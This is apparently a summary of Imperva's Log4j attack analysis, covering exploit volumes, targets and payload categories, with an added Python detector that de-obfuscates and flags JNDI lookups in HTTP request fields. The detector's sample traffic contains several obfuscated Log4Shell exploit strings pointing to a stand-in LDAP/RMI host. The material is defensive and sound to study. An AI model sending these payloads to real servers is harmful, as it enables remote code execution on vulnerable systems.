Log4j Analysis: Attack Patterns, Payloads And Bypass Techniques

Imperva Research Labs has released its analysis of the recent Log4j-related vulnerabilities, covering attack patterns, payloads and bypass techniques.

Key data points:

●      Imperva observed over 102M exploitation attempts since the disclosure on December 9.

●      In the first 10 days, Imperva observed almost 1.3M exploit attempts per hour. Since the peak on December 23, there has been a general decline in the number of exploit attempts.

●      The number of sites attacked peaked at 25K sites per hour.

●      Commonly targeted industries are Financial Services (29.6%), Food and Beverages (12.4%) and Computing and IT (10.4%).

●      Exploit attempts came from over 100 different types of web clients. The most prevalent of these was the Go HTTP library, with over 10M requests and counting.

●      Imperva observed attacks targeting sites in over 160 different countries. The US saw the majority of exploit attempts (46.5%), but Australia is in the top 6 at 3.5%. New Zealand ranked 11th at 1.5%.

Attack Patterns: Attackers largely took a “spray and pray” approach, sending the exploit string indiscriminately to large numbers of hosts rather than to known-vulnerable targets. Many IPs used a common technique known as “fuzzing” to identify vulnerable Java web applications: placing the JNDI lookup string in many different request fields (URL parameters, headers such as User-Agent and X-Forwarded-For, form bodies) in the hope that at least one of them is written to a log by a vulnerable Log4j instance.
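The spraying across request fields described above, and the lookup-obfuscation bypasses the report's title refers to, as an added example (this is illustrative code written for this page, not code from Imperva's report): a small Python detector that URL-decodes each field, resolves the Log4j lookup forms commonly used to hide the keyword (`${lower:…}`, `${upper:…}`, `${::-x}`, `${env:NAME:-x}`) from the inside out, then reports every field in which a `${jndi:…}` lookup survives and which scheme it points at. Grouping findings by source IP shows the one-scanner-many-fields pattern. The sample requests, IP addresses and field names are constructed for the example.

```python
import re
from urllib.parse import unquote

# Innermost Log4j lookup: a ${...} whose body holds no further ${ or }.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A de-obfuscated JNDI lookup and the scheme it uses (ldap, rmi, dns, ...).
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)\s*:", re.IGNORECASE)


def resolve_lookup(body: str) -> str:
    """Resolve one innermost lookup as far as detection needs: lower/upper are
    applied; every other lookup is assumed to fail so its ':-default' is taken,
    which is exactly what the obfuscation relies on."""
    prefix, _, rest = body.partition(":")
    kind = prefix.strip().lower()
    if kind in ("lower", "upper"):
        text = rest.split(":-", 1)[0]          # drop an unused default value
        return text.lower() if kind == "lower" else text.upper()
    if ":-" in body:
        return body.split(":-", 1)[1]          # ${::-j} and ${env:NOPE:-j} give "j"
    return ""                                  # ${10}, ${date:...}: no keyword text


def _resolve_round(s: str):
    """Replace every innermost non-JNDI lookup once; keep ${jndi:...} itself."""
    out, pos, changed = [], 0, False
    for m in INNER_LOOKUP.finditer(s):
        out.append(s[pos:m.start()])
        if m.group(1).split(":", 1)[0].strip().lower() == "jndi":
            out.append(m.group(0))             # the payload we want to see
        else:
            out.append(resolve_lookup(m.group(1)))
            changed = True
        pos = m.end()
    out.append(s[pos:])
    return "".join(out), changed


def normalize(value: str, max_rounds: int = 50) -> str:
    """Strip layered URL-encoding, then collapse nested lookups inside-out."""
    s = value
    for _ in range(3):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    for _ in range(max_rounds):
        s, changed = _resolve_round(s)
        if not changed:
            break
    return s


def scan_request(req: dict) -> list:
    """One finding per field that still carries a JNDI lookup after
    normalization. 'src_ip' is connection metadata, not attacker input."""
    findings = []
    for field, value in req.items():
        if field == "src_ip":
            continue
        norm = normalize(value)
        for m in INNER_LOOKUP.finditer(norm):
            j = JNDI_RE.match(m.group(0))
            if j:
                findings.append({"field": field, "scheme": j.group(1).lower(),
                                 "lookup": m.group(0)})
    return findings


def summarize(requests: list) -> dict:
    """Group findings by source IP; many fields hit from one IP is the
    spray-and-pray fuzzing pattern."""
    by_ip = {}
    for req in requests:
        found = scan_request(req)
        if found:
            by_ip.setdefault(req["src_ip"], []).extend(found)
    return by_ip


# Constructed sample traffic (not Imperva's data): two requests from one
# scanner spraying obfuscated lookups over several fields, then a benign one.
SAMPLE_REQUESTS = [
    {"src_ip": "203.0.113.10",
     "path": "/login?user=%24%7Bjndi%3Aldap%3A%2F%2F198.51.100.7%3A1389%2Fa%7D",
     "User-Agent": "${${lower:j}${upper:n}${::-d}${env:NOPE:-i}:ldap://198.51.100.7:1389/a}",
     "X-Forwarded-For": "${jNdI:${lower:L}${lower:d}a${lower:p}://198.51.100.7/x}",
     "Referer": "https://example.test/"},
    {"src_ip": "203.0.113.10",
     "path": "/api/v1/login",
     "User-Agent": "curl/7.79.1",
     "body": "username=${jndi:${::-r}mi://198.51.100.7:1099/obj}&password=x"},
    {"src_ip": "198.51.100.20",
     "path": "/search?q=price%20%24%7B10%7D",
     "User-Agent": "Mozilla/5.0",
     "X-Forwarded-For": "10.0.0.5"},
]

if __name__ == "__main__":
    for ip, hits in summarize(SAMPLE_REQUESTS).items():
        for h in hits:
            print(ip, h["field"], h["scheme"], h["lookup"])
```

Resolving lookups before matching is what defeats the bypasses: a plain `jndi:` string match misses every request in the first sample above except the URL-decoded path. This kind of normalization is a compensating control at the WAF or log pipeline, not a fix; the vulnerable Log4j still has to be upgraded (or the JndiLookup class removed where an upgrade is not possible), and any host that has already logged such a string should be treated as possibly compromised and checked for the outbound LDAP or RMI connection the payload tries to make.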

Payload Analysis: Imperva witnessed many different payloads used in the exploitation of Log4Shell and divides them into five categories: probing, reverse shells, malware deployment, data exfiltration and patching.

Future Outlook: Imperva predicts that a tidal wave of breaches stemming from this vulnerability will be reported over the next year, affecting organisations of all sizes, along with a sharp increase in ransomware attacks and exploitative crypto-mining activity. Botnets will use the vulnerability to expand, so the volume of application-layer and network DDoS attacks will increase.